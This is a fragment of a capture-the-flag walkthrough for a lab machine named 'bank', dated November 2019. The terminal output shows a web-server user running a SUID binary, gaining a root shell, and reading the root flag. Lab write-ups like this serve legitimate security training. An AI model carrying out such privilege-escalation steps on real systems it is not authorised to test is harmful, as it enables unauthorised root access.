www-data
www-data@bank:/tmp$ /var/htb/bin/emergency
/var/htb/bin/emergency
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>

References

Daniel Simao 18:03, 21 November 2019 (EST)